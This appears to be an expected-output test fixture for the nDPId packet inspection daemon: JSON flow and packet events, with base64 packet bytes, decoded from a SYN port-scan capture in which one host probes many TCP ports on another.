+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1071,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1062,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsIK8AADIG9cOsEAAIQA2GNIzTeT7dU4MZAAAAAGACDACzTQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1072,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1063,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1072,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1063,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/sQAADgGEa6sEAAIQA2GNIzSIyrdUoMYAAAAAGACBAARZQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1073,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1064,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1073,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1064,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsVMoAADsGuKisEAAIQA2GNIzSF27dUoMYAAAAAGACEAARIQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1074,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1065,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1074,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1065,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsq0AAADQGaTKsEAAIQA2GNIzSJR\/dUoMYAAAAAGACBAAPcAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1075,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1066,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1062,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1075,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1066,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/zAAADgGEUKsEAAIQA2GNIzSBCbdUoMYAAAAAGACBAAwaQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1076,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1067,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1076,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1067,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAs2mcAADEGPQusEAAIQA2GNIzSBMHdUoMYAAAAAGACCAArzgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1077,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1068,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1077,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1068,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsXjcAACwGvjusEAAIQA2GNIzSw1HdUoMYAAAAAGACBABxPQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1078,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1069,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3325,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1078,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1069,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsxg8AACsGV2OsEAAIQA2GNIzSDP3dUoMYAAAAAGACEAAbkgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1079,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1070,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1079,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1070,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsAGYAADsGDQ2sEAAIQA2GNIzSA\/PdUoMYAAAAAGACEAAknAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1071,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1117,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1071,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsB0kAADQGDSqsEAAIQA2GNIzSBF3dUoMYAAAAAGACBAAwMgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1081,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1072,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1533,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1081,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1072,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAsslAAAC0GaSKsEAAIQA2GNIzSBf3dUoMYAAAAAGACCAAqkgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1082,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1073,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1073,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAszUIAACcGVDCsEAAIQA2GNIzSDUzdUoMYAAAAAGACEAAbQwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1083,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1074,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1074,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAsQ5AAACsG2eKsEAAIQA2GNIzTB\/PdU4MZAAAAAGACEAAgmQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1084,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1075,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1084,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1075,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAs7zYAADIGJzysEAAIQA2GNIzTANPdU4MZAAAAAGACDAAruQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1085,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1076,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5907,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1085,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1076,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAs7vQAACkGMH6sEAAIQA2GNIzTFxPdU4MZAAAAAGACCAAZeQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1086,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1077,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1037,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1086,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1077,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAswO4AADsGTISsEAAIQA2GNIzTBA3dU4MZAAAAAGACEAAkfwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1078,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1078,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAsw+IAADkGS5CsEAAIQA2GNIzTFvXdU4MZAAAAAGACCAAZlwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1088,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1079,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1079,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAsxCgAAC4GVkqsEAAIQA2GNIzTE+7dU4MZAAAAAGACDAAYngAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1089,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1080,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1080,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAs6TsAACUGOjesEAAIQA2GNIzTI3jdU4MZAAAAAGACCAANFAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1090,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1081,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1081,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ+IAAC4GspCsEAAIQA2GNIzTApvdU4MZAAAAAGACDAAp8QAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1091,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1082,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1091,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1082,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAs+AoAACcGKWisEAAIQA2GNIzTJpbdU4MZAAAAAGACEAAB9gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1092,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1083,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1092,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1083,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAs8zIAADAGJUCsEAAIQA2GNIzTFw7dU4MZAAAAAGACBAAdfgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1093,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1084,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1084,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAsNTwAADgG2zasEAAIQA2GNIzTNdbdU4MZAAAAAGACBAD+tQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1094,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1085,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1094,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1085,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsX7wAAC4GurasEAAIQA2GNIzTBJbdU4MZAAAAAGACDAAn9gAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1095,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1086,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
